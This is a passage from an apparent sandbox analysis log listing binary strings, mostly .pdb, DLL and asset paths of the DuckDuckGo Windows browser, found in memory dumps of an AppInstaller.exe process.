00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: W2.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Updater.pdbpdbon source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: W.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: N/WindowsBrowser/WebView2/Locales/de.pakN/Images/Square150x150Logo.scale-400.pngR/WindowsBrowser/System.Runtime.Loader.dllJ/WindowsBrowser/WebView2/vulkan-1.dllN/Images/Square150x150Logo.scale-200.pngN/WindowsBrowser/WebView2/Locales/el.pakP/WindowsBrowser/WebView2/onnxruntime.dllL/WindowsBrowser/Images/TwitterDark.pngV/WindowsBrowser/Images/VerizonmediaDark.pngP/WindowsBrowser/System.Globalization.dllN/WindowsBrowser/WebView2/msedge_wer.dllV/WindowsBrowser/System.Numerics.Vectors.dllN/WindowsBrowser/WebView2/Locales/it.pakJ/Images/Square44x44Logo.scale-100.pngT/WindowsBrowser/WebView2/Locales/en-GB.pakJ/WindowsBrowser/WebView2/msvcp140.dllL/WindowsBrowser/Nito.AsyncEx.Tasks.dllT/WindowsBrowser/System.Dynamic.Runtime.dllJ/Images/Wide310x150Logo.scale-400.pngR/WindowsBrowser/System.ServiceProcess.dllJ/Images/Wide310x150Logo.scale-100.pngL/WindowsBrowser/DuckDuckGo.WebView.pdbH/WindowsBrowser/Nito.Disposables.dllM source: AppInstaller.exe, 00000008.00000002.3030813390.0000019EC9258000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.WebView.pdbWindowsBrowser/DuckDuckGo.Windows.pdbiew2.pdbWindowsBrowser/WindowsBrowser.Styles.pdbmImages/Wide310x150Logo.scale-400.png source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.CrashReporting.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbWindowsBrowser/DuckDuckGo.VPN.Tray.pdbom source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdbP source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/NetworkProtection.Grpc.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.pdb0" source: AppInstaller.exe, 00000008.00000002.3034286415.0000019EC9823000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Autocomplete.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: T/WindowsBrowser/WindowsBrowser.Privacy.pdbL/WindowsBrowser/DuckDuckGo.Updater.pdbN/WindowsBrowser/Namotion.Reflection.dll/WindowsBrowser/WindowsBrowser.Styles.dllono source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WEBVIEW2/MSVCP140_CODECVT_IDS.DLL/WINDOWSBROWSER/WEBVIEW2/NOTIFICATION_HELPER.EXEDLL/WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdb/WindowsBrowser/WebView2/msvcp140_codecvt_ids.dllll source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/System.DirectoryServices.AccountManagement.dll/WindowsBrowser/Microsoft.AspNetCore.Authorization.Policy.dllL/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.deps.json/WindowsBrowser/Grpc.AspNetCore.Server.ClientFactory.dll.pdb/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.deps.json/WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb/WINDOWSBROWSER/GRPC.ASPNETCORE.SERVER.CLIENTFACTORY.DLL.PDB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Updater.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: te.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.Updater.deps.jsonDB/WindowsBrowser/Grpc.Net.ClientFactory.dll.DLL/WINDOWSBROWSER/WINDOWSBROWSER.BURNING.PDBb/WindowsBrowser/WindowsBrowser.CrashHandler.pdb/WindowsBrowser/NetworkProtection.Grpc.pdb/WindowsBrowser/WindowsBrowser.Privacy.pdbon/WINDOWSBROWSER/NETWORKPROTECTION.GRPC.PDB source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/MICROSOFT.CODEANALYSIS.CSHARP.DLLLL/WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdb/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PDBbb/WindowsBrowser/WindowsBrowser.Autocomplete.Public.xml/WINDOWSBROWSER/DUCKDUCKGO.UPDATER.RUNTIMECONFIG.JSON/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.PDB/WindowsBrowser/WindowsBrowser.SecureStorage.pdb.png/WindowsBrowser/DuckDuckGo.VPN.Tray.runtimeconfig.json source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.VPN.Tray.pdb/WindowsBrowser/DuckDuckGo.VPN.Tray.pdb/WINDOWSBROWSER/THEMES/DARK.XAML/WindowsBrowser/DuckDuckGo.Updater.pdb/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.PDB/WindowsBrowser/DuckDuckGo.VPN.Tray.pdb/WindowsBrowser/DuckDuckGo.WebView.pdb/WindowsBrowser/DuckDuckGo.Windows.pdb/WindowsBrowser/Themes/Dark.xaml/WINDOWSBROWSER/DUCKDUCKGO.VPN.TRAY.PDB/WINDOWSBROWSER/THEMES/LIGHT.XAML/WINDOWSBROWSER/THEMES/DARK.XAML/WINDOWSBROWSER/DUCKDUCKGO.WINDOWS.PDB source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.Windows.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/NETWORKPROTECTION.GRPC.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: P/WindowsBrowser/SkiaSharp.SceneGraph.dllT/WindowsBrowser/NetworkProtection.Grpc.pdb/WindowsBrowser/WindowsBrowser.Styles.dllll source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/Themes/Light.xamlpngWindowsBrowser/DuckDuckGo.WebView.WebView2.pdbWindowsBrowser/Themes/Light.xamle.com source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ay.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/DuckDuckGo.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Common.Wpf.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d/WindowsBrowser/pt-BR/PresentationUI.resources.dll^/WindowsBrowser/ko/PresentationUI.resources.dll`/WindowsBrowser/Microsoft.Extensions.Logging.dll^/WindowsBrowser/DuckDuckGo.WebView.WebView2.pdb^/WindowsBrowser/fr/PresentationUI.resources.dll^/WindowsBrowser/cs/PresentationUI.resources.dll8& source: AppInstaller.exe, 00000008.00000002.3031891318.0000019EC9443000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdb/WindowsBrowser/DuckDuckGo.PersonalInfoRemoval.pdb/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.PDB/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.PDBPDB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WebView2/Locales/vi.pakWindowsBrowser/WebView2/Locales/zh-CN.pakWindowsBrowser/WebView2/Locales/zh-CN.pakmWindowsBrowser/WebView2/Locales/zh-TW.pakmWindowsBrowser/WindowsBrowser.SecureStorage.pdb source: AppInstaller.exe, 00000008.00000002.3033983146.0000019EC9789000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.PDBDB/WindowsBrowser/DuckDuckGo.CrashReporter.pdb/WINDOWSBROWSER/WINDOWSBROWSER.CRASHHANDLER.PDB/WINDOWSBROWSER/DBGX.INTERFACES.INTERNAL.DLL/WINDOWSBROWSER/DUCKDUCKGO.RUNTIMECONFIG.JSONb source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WindowsBrowser/WindowsBrowser.CrashReporting.pdbN.PDB/WindowsBrowser/WindowsBrowser.CrashReporting.pdb/WindowsBrowser/WebView2/msvcp140_codecvt_ids.dll/WindowsBrowser/WebView2/notification_helper.exe/WINDOWSBROWSER/WEBVIEW2/NOTIFICATION_HELPER.EXE/WINDOWSBROWSER/WEBVIEW2/MSVCP140_CODECVT_IDS.DLLLL/WindowsBrowser/WindowsBrowser.CrashReporting.pdbn.pdb/WINDOWSBROWSER/WEBVIEW2/DUAL_ENGINE_ADAPTER_X86.DLL/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.PDB/WINDOWSBROWSER/WEBVIEW2/DUAL_ENGINE_ADAPTER_X64.DLL/WINDOWSBROWSER/WINDOWSBROWSER.DATABROKERPROTECTION.PDB/WindowsBrowser/WebView2/msvcp140_codecvt_ids.dll/WINDOWSBROWSER/WINDOWSBROWSER.SECURESTORAGE.PDBC.PDB/WINDOWSBROWSER/WINDOWSBROWSER.SECURESTORAGE.PDB/WindowsBrowser/WindowsBrowser.SecureStorage.pdb/WINDOWSBROWSER/DUCKDUCKGO.PERSONALINFOREMOVAL.PDB/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PDBB/WINDOWSBROWSER/WINDOWSBROWSER.USERPREFERENCES.PDBB source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Windows.pdbcomImages/Wide310x150Logo.scale-100.pngWindowsBrowser/DuckDuckGo.WebView.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.CrashHandler.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: s.pdb source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: er.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.WINDOWS.PDB source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/NetworkProtection.Grpc.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Autocomplete.Public.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: application/x-msdownloado.pdb source: AppInstaller.exe, 00000008.00000002.3032102117.0000019EC947F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Bookmarks.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.CrashReporter.pdbdbWindowsBrowser/WindowsBrowser.Autocomplete.pdb source: AppInstaller.exe, 00000008.00000002.3034167585.0000019EC97E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DB/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.WEBVIEW2.PDBP| source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ic.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: GE.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: |/WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdbx/WindowsBrowser/pl/System.Private.ServiceModel.resources.dllhttp://www.example.com/WindowsBrowser/Nito.Collections.Deque.dllng source: AppInstaller.exe, 00000008.00000002.3031274677.0000019EC92F1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ge.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.DataBrokerProtection.pdbed.pdb source: AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: DB/WINDOWSBROWSER/DUCKDUCKGO.CRASHREPORTER.PDB source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: O.PDB source: AppInstaller.exe, 00000008.00000002.3034286415.0000019EC9823000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3034383935.0000019EC984E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.UserPreferences.Public.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /IMAGES/SQUARE44X44LOGO.ALTFORM-UNPLATED_TARGETSIZE-32.PNG/WindowsBrowser/WindowsBrowser.DataBrokerProtection.Shared.pdb source: AppInstaller.exe, 00000008.00000002.3034102665.0000019EC97B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.SecureStorage.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Common.Wpf.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/WindowsBrowser.Privacy.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/DUCKDUCKGO.UPDATER.PDB@Q source: AppInstaller.exe, 00000008.00000002.3034947424.0000019EC9970000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: WindowsBrowser/DuckDuckGo.Windows.pdbPK source: AppInstaller.exe, 00000008.00000003.2978807685.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978677371.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979257702.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979203940.0000019EC9313000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978645854.0000019EC92DC000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979183010.0000019EC9429000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000807489.0000019EC9322000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000002.3031655833.0000019EC9400000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.3000787565.0000019EC9302000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2978699019.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2990931104.0000019EC94C5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000008.00000003.2979234506.0000019EC9303000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WEBVIEW2/MSEDGEWEBVIEW2.EXE.SIG/WINDOWSBROWSER/DUCKDUCKGO.WEBVIEW.WEBVIEW2.PDB/WindowsBrowser/WebView2/vk_swiftshader.dllPAK/WINDOWSBROWSER/WEBVIEW2/LEARNING_TOOLS.DLLll/WindowsBrowser/WindowsBrowser.Styles.pdb.SIG/WindowsBrowser/WindowsBrowser.Autocomplete.pdb/Images/Square44x44Logo.targetsize-48.pngT.PAK/WINDOWSBROWSER/WEBVIEW2/WNS_PUSH_CLIENT.DLLL source: AppInstaller.exe, 00000008.00000002.3034535563.0000019EC9870000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.STYLES.PDB/WindowsBrowser/WindowsBrowser.Common.Wpf.pdb source: AppInstaller.exe, 00000008.00000002.3034221970.0000019EC9800000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: /WINDOWSBROWSER/WINDOWSBROWSER.NETWORKPROTECTION.PDBl/WindowsBrowser/WindowsBrowser.NetworkProtection.pdbL source: AppInstaller.exe, 00000008.00000002.3035019047.0000019EC9992000.00000004.00000020.00020000.00000000.sdmp
